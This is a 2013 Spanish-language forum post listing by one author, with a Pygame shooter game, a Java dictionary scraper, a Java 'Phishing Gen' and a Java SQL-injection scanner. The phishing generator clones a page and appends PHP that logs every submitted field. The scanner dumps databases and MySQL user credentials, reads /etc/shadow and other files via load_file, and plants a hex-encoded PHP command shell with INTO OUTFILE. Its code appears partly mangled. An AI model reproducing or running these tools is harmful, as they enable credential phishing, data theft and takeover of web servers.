|
191
|
Programación / Scripting / Mi primer juego en Pygame : UrbanWar
|
en: 21 Febrero 2013, 01:15 am
|
Bue , recien acabo de terminar mi primer juego en Pygame , para hacerlo me base en el famoso juego Rock Blaster hecho por Jeff Walters. El juego trata de sobrevivir 1 minuto en un barrio peligroso , comienzan a llover ladrones armados por todos lados y el protagonista tiene una M4 con municion infinita. A grandes rasgos el juego esta basado en la vida real solo que en este caso no todos tenemos una M4 xDDD. Una imagen del juego : EL codigo : #!usr/bin/python #UrbanWar 0.1 #Coded By Doddy H in the year 2013 #My first game in Pygame #Based in the game Rock Blaster made by Jeff Walters #Thanks to Jeff Walters import pygame import sys,os,time from pygame.locals import * import random tiempoportiro = 1 class theboss(pygame.sprite.Sprite): def __init__(self,esto): pygame.sprite.Sprite.__init__(self,self.mas) self.image = pygame.image.load("archivos/ladron.gif") self.rect = self.image.get_rect( center = (random.randint(0,860),0)) self.cada = esto def update(self): self.rect.move_ip(self.cada,3) class protagonista(pygame.sprite.Sprite): def __init__(self): pygame.sprite.Sprite.__init__(self,self.mas) self.image = pygame.image.load("archivos/protagonista.gif") self.rect = self.image.get_rect(center = (860,640)) def update(self): global tiempoportiro if pygame.key.get_pressed()[K_LEFT]: self.rect.move_ip(-5,0) if pygame.key.get_pressed()[K_RIGHT]: self.rect.move_ip(5,0) if pygame.key.get_pressed()[K_SPACE] and tiempoportiro <= 0: pygame.mixer.Sound("archivos/disparo.wav").play() tiempoportiro = 25 cartucho(self.rect.midtop) tiempoportiro -= 1 self.rect.clamp_ip(Rect(0,0,860,640)) class chau(pygame.sprite.Sprite): def __init__(self, actor): pygame.sprite.Sprite.__init__(self,self.mas) self.image = pygame.image.load("archivos/explo.gif") self.rect = self.image.get_rect(center=actor.rect.center) self.tie = 10 def update(self): self.tie = self.tie - 2 if self.tie <= 0: self.kill() class cartucho(pygame.sprite.Sprite): def __init__(self,toyaca): pygame.sprite.Sprite.__init__(self,self.mas) self.image = pygame.image.load("archivos/bala.gif") self.rect = self.image.get_rect(midbottom = toyaca) def update(self): self.rect.move_ip(-30,-50) if not Rect(0,0,860,640).contains(self.rect): self.kill() pygame.init() mil = 0 theboss_cadacuanto = 30 cro = pygame.time.Clock() pantalla = pygame.display.set_mode((860,640),0,32) #pantalla = pygame.display.set_mode((860,640),FULLSCREEN) # FULLSCREEN fondo = pygame.image.load("archivos/callejon.jpg") pygame.display.set_caption("UrbanWar 0.1") pygame.mouse.set_visible(False) protagonistamas = pygame.sprite.Group() protagonista.mas = protagonistamas protagonista = protagonista() thebossmas = pygame.sprite.Group() theboss.mas = thebossmas cartuchomas = pygame.sprite.Group() cartucho.mas = cartuchomas chaumas = pygame.sprite.Group() chau.mas = chaumas mostrar = pygame.font.Font("archivos/FreeSansBold.ttf",36) pygame.mixer.Sound("archivos/menu.wav").play() men = pygame.image.load("archivos/menu.jpg") pantalla.blit(men,(0,0)) pygame.display.update() time.sleep(9) while 1: mil += cro.tick() casi = mil/1000 casi = 60 - casi if casi == 0: win = pygame.image.load("archivos/mina.jpg") pantalla.blit(win,(0,0)) pygame.display.update() time.sleep(10) sys.exit(1) tiempoquefalta = mostrar.render("Remaining Time : "+str(casi),True,(255,0,0)) pantalla.blit(tiempoquefalta,(500,20)) pygame.display.update() pantalla.blit(fondo,(0,0)) protagonistamas.draw(pantalla) protagonistamas.update() thebossmas.draw(pantalla) thebossmas.update() cartuchomas.draw(pantalla) cartuchomas.update() chaumas.draw(pantalla) chaumas.update() if theboss_cadacuanto: theboss_cadacuanto = theboss_cadacuanto - 1 else: asteroid = theboss(random.randint(-6,5)) theboss_cadacuanto = 20 for asteroid in pygame.sprite.groupcollide(cartuchomas,thebossmas,1,1): pygame.mixer.Sound("archivos/muerte.wav").play() chau(asteroid) for asteroid in pygame.sprite.spritecollide(protagonista,thebossmas,1): pygame.mixer.Sound("archivos/muerte.wav").play() chau(protagonista) protagonista.kill() over = pygame.image.load("archivos/gameover.jpg") pantalla.blit(over,(0,0)) pygame.display.update() time.sleep(10) sys.exit(1) for event in pygame.event.get(): if event.type == QUIT: break cap = pygame.key.get_pressed(); if cap[K_ESCAPE]: sys.exit(1) pygame.display.update() #The End ?
Para bajar el codigo con las imagenes o el juego compilado lo pueden hacer de aca.
|
|
|
192
|
Programación / Java / [Java] Diccionario Online 0.1
|
en: 12 Febrero 2013, 18:08 pm
|
Practicando en este lenguaje hice este simple diccionario online , solo ponen una palabra y el programa les devuelve el significado (si es que lo encuentra xDD) //Diccionario Online 0.1 //Coded By Doddy H import java.util.Scanner; import java.net.*; import java.io.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { Scanner host = new Scanner (System. in); System. out. println("\n\n-- == Diccionario Online 0.1 == --\n\n"); System. out. println("[+] Palabra : "); palabra = host.nextLine(); code = toma("http://es.thefreedictionary.com/" + palabra); Pattern uno = null; Matcher dos = null; uno = Pattern.compile("<div class=runseg><b>1 </b> (.*?)[.:<]"); dos = uno.matcher(code); if (dos.find()) { System. out. println("\n" + dos. group(1)); } else { System. out. println("\n[-] No se encontro el significado"); } System. out. println("\n\n-- == Coded By Doddy H == --\n\n"); } hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } } //The End ?
|
|
|
193
|
Programación / Java / [Java] Phishing Gen 0.1
|
en: 12 Febrero 2013, 18:07 pm
|
Tratando de practicar este lenguaje hice este simple generador de fakes. //Phishing Gen 0.1 //Coded By Doddy H import java.util.Scanner; import java.net.*; import java.io.*; public class Main { Scanner host = new Scanner (System. in); System. out. println("\n\n-- == Phishing Gen 0.1 == --\n\n"); System. out. println("[+] Pagina : "); pagina = host.nextLine(); iny = "<?php $file = fopen('dump.txt','a');foreach($_POST as $uno => $dos) {fwrite($file, $uno.'='.$dos.'\r\n');}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres.'='.$cuatro.'\r\n');}fclose($file); ?>"; code = toma(pagina); savefile("fake.php", code + iny); System. out. println("\n[+] Fake Ready"); System. out. println("\n\n-- == Coded By Doddy H == --\n\n"); } hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } writer.write(texto + "\r\n"); writer.close(); } } //The End ?
|
|
|
194
|
Programación / Desarrollo Web / Mi primer template : GreenKaker
|
en: 4 Febrero 2013, 03:04 am
|
Este es mi primer template , lo hice porque queria hacer un diseño parecido que vi en internet si quieren verlo lo puede hacer de aca , es bien basico solo hice el index. Pueden bajar el template desde aca. Una imagen Cualquier sugerencia diganla para mejorar.
|
|
|
195
|
Programación / Java / [Java] SQLI Scanner 0.2
|
en: 22 Enero 2013, 01:34 am
|
Traduccion completa de este simple programa para scannear paginas vulnerables a SQLI llamado k0bra que habia hecho antiguamente en Perl. Con las siguientes opciones : - Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostras tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
Un ejemplo de uso : -- == SQLI Scanner 0.2 == --
[+] Page : http://localhost/sql.php?id=
[+] Checking ...
[+] Scanning ...
[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3 [Limit] : The site has 3 columns [Data] : The number 1 print data
-- == OPTIONS == --
--== information_schema.tables ==-- [1] : Show tables [2] : Show columns [3] : Show DBS [4] : Show tables with other DB [5] : Show columns with other DB --== mysql.user ==-- [6] : Show users --== Others ==-- [7] : Fuzzing files with load_file [8] : Read a file with load_file [9] : Dump [10] : Informacion of the server [11] : Create a shell with into outfile [12] : Show Log [13] : Exit
[Option] : 10
[+] Searching informaion ...
[+] DB Version : 5.5.20-log [+] DB Name : hackman [+] Username : root@localhost [+] information_schema : on [+] mysqluser : on [-] load_file : off
[+] Finished
El codigo es el siguiente : // -- == -- == -- == ---- == // SQLI Scanner 0.2 || // -- == -- == -- == ---- == // (C) Doddy Hackman 2013 || // -- == -- == -- == ---- == import java.util.Scanner; import java.io.*; import java.net.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { Scanner host = new Scanner (System. in); installer(); System. out. println("\n\n-- == SQLI Scanner 0.2 == --\n\n"); System. out. println("[+] Page : "); target = host.nextLine(); scan(target); //schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers"); //getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman"); //getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers"); //mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password"); //fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt"); //intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/"); } while (true) { System. out. println("\n-- == OPTIONS == --\n"); System. out. println("--== information_schema.tables ==--"); System. out. println("[1] : Show tables"); System. out. println("[2] : Show columns"); System. out. println("[3] : Show DBS"); System. out. println("[4] : Show tables with other DB"); System. out. println("[5] : Show columns with other DB"); System. out. println("--== mysql.user ==--"); System. out. println("[6] : Show users"); System. out. println("--== Others ==--"); System. out. println("[7] : Fuzzing files with load_file"); System. out. println("[8] : Read a file with load_file"); System. out. println("[9] : Dump"); System. out. println("[10] : Informacion of the server"); System. out. println("[11] : Create a shell with into outfile"); System. out. println("[12] : Show Log"); System. out. println("[13] : Exit"); int op; Scanner host = new Scanner (System. in); System. out. println("\n[Option] :"); op = host.nextInt(); if (op == 1) { schematables(urla); continuar(); } else if (op == 2) { Scanner a = new Scanner (System. in); System. out. println("\n[+] Table : "); coler = a.nextLine(); schemacolumns(urla, coler); continuar(); } else if (op == 3) { getdbs(urla); continuar(); } else if (op == 4) { Scanner a = new Scanner (System. in); System. out. println("\n[+] DB : "); tabler = a.nextLine(); getablesbydb(urla, tabler); continuar(); } else if (op == 5) { Scanner a = new Scanner (System. in); System. out. println("\n[+] DB : "); dber = a.nextLine(); Scanner b = new Scanner (System. in); System. out. println("\n[+] Table : "); tablerx = a.nextLine(); getcolbydb(urla, dber, tablerx); continuar(); } else if (op == 6) { mysqluser(urla); continuar(); } else if (op == 7) { fuzzfiles(urla); continuar(); } else if (op == 8) { Scanner f = new Scanner (System. in); System. out. println("\n[+] File : "); ar = f.nextLine(); openfile(urla, ar); continuar(); } else if (op == 9) { Scanner m = new Scanner (System. in); System. out. println("\n[+] Table : "); a = m.nextLine(); Scanner n = new Scanner (System. in); System. out. println("\n[+] Column 1 : "); b = n.nextLine(); Scanner l = new Scanner (System. in); System. out. println("\n[+] Column 2 : "); c = l.nextLine(); dumper(urla, a, b, c); continuar(); } else if (op == 10) { details(urla); continuar(); } else if (op == 11) { Scanner m = new Scanner (System. in); System. out. println("\n[+] Full Path Discloure : "); b = m.nextLine(); Scanner n = new Scanner (System. in); System. out. println("\n[+] Directory to test : "); c = n.nextLine(); intofile(urla, b, c); continuar(); } else if (op == 12) { ruta = System. getProperty("user.dir") + "/logs/" + h. getHost() + ".txt"; System. out. println("\n[+] Check logs in : " + ruta ); continuar(); } else if (op == 13) { System. out. println("\n-- == (C) Doddy Hackman 2013 == --"); continuar(); } else { System. out. println("\n[-] Bad Option\n"); continuar(); } } } private static void continuar () throws Exception { System. out. println("\n[+] Finished\n"); Scanner chau = new Scanner (System. in); chau.nextLine(); } private static void installer () throws Exception { if (!crear.isDirectory()) { crear.mkdirs(); } } linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"; lugar = fpd + "/cmd.php"; lugardos = dir + "/cmd.php"; System. out. println("\n[+] Checking ...\n"); webtest = "http://" + h.getHost() + lugardos; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", linea); formandoweb = web1 + "+into+outfile+'" + lugar + "'--"; code = toma(formandoweb); code = toma(webtest); uno = Pattern.compile("Mini Shell By Doddy"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[Shell UP] : " + webtest ); savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n"); } else { System. out. println("[-] Error"); } } Pattern uno = null; Matcher dos = null; archivo = encodehex(file); web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))"); System. out. println("\n[+] Reading ...\n"); code = toma(web1); uno = Pattern.compile("ERTOR854(.*?)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] File Found : " + file ); System. out. println("\n[Source Start]\n"); System. out. println(dos. group(1)); System. out. println("\n[Source End]\n"); savefile(urla, "\r\n" + "[+] File Found : " + file); savefile(urla, "\r\n" + "[Source Start]" + "\r\n"); savefile(urla, dos.group(1)); savefile(urla, "\r\n" + "[Source End]" + "\r\n"); } else { System. out. println("[-] Not Found"); } } String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"}; Pattern uno = null; Matcher dos = null; System. out. println("\n[+] Searching files with load_file() ....\n"); for (int count = 0; count < archivos.length; count++) { archivo = encodehex(archivos[count]); web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))"); code = toma(web1); uno = Pattern.compile("ERTOR854(.*?)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] File Found : " + archivos [count ]); System. out. println("\n[Source Start]\n"); System. out. println(dos. group(1)); System. out. println("\n[Source End]\n"); savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]); savefile(urla, "\r\n" + "[Source Start]" + "\r\n"); savefile(urla, dos.group(1)); savefile(urla, "\r\n" + "[Source End]" + "\r\n"); } } } int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))"); code = toma(web1 + "+from+" + tabla + "--"); System. out. println("\n[+] Getting Values ..."); uno = Pattern.compile("K0BRA(.*?)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("\n[+] Values Founds : " + dos. group(1)); savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n"); int finals = Integer. parseInt(dos. group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("\n[+] " + col1 + " : " + dos. group(1)); System. out. println("[+] " + col2 + " : " + dos. group(2)); savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1)); savefile(urla, "[+] " + col2 + " : " + dos.group(2)); } } } else { System. out. println("[-] Not Found"); } } int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))"); System. out. println("\n[+] Searching mysql.user ...."); code = toma(web1 + "+from+mysql.user--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("\n[+] Users Found : " + dos. group(1)); savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n"); int finals = Integer. parseInt(dos. group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2"); dos = uno.matcher(code); if (dos.find()) { System. out. println("\n[+] Host : " + dos. group(1)); System. out. println("[+] Username : " + dos. group(2)); System. out. println("[+] Password : " + dos. group(3)); savefile(urla, "\r\n" + "[+] Host : " + dos.group(1)); savefile(urla, "[+] Username : " + dos.group(2)); savefile(urla, "[+] Password : " + dos.group(3)); } } } else { System. out. println("[-] Not Found"); } } int x; Pattern uno = null; Matcher dos = null; dbf = encodehex(db); table = encodehex(tab); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))"); System. out. println("\n[+] Getting Columns ...."); code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("\n[+] Columns Found : " + dos. group(1) + "\n"); savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n"); int finals = Integer. parseInt(dos. group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] Column Found : " + dos. group(1)); savefile(urla, "[+] Column Found : " + dos.group(1)); } } } else { System. out. println("[-] Not Found"); } } int x; Pattern uno = null; Matcher dos = null; data = encodehex(db); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))"); System. out. println("\n[+] Getting Tables ...."); code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("\n[+] Tables Found : " + dos. group(1) + "\n"); savefile(urla, "\r\n" + "[DB] : " + db + "\r\n"); int finals = Integer. parseInt(dos. group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] Table Found : " + dos. group(1)); savefile(urla, "[+] Table Found : " + dos.group(1)); } } } else { System. out. println("[-] Not Found"); } } int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))"); System. out. println("\n[+] Getting DBS ...."); code = toma(web1 + "+from+information_schema.schemata--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("\n[+] DBS Found : " + dos. group(1) + "\n"); savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n"); int finals = Integer. parseInt(dos. group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] DB Found : " + dos. group(1)); savefile(urla, "[+] DB Found : " + dos.group(1)); } } } else { System. out. println("[-] Not Found"); } } int x; Pattern uno = null; Matcher dos = null; tablexa = encodehex(nombre); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))"); System. out. println("\n[+] Getting columns ...."); code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("\n[+] Columns Found : " + dos. group(1) + "\n"); savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n"); int finals = Integer. parseInt(dos. group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] Column Found : " + dos. group(1)); savefile(urla, "[+] Column Found : " + dos.group(1)); } } } else { System. out. println("[-] Not Found"); } } int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))"); System. out. 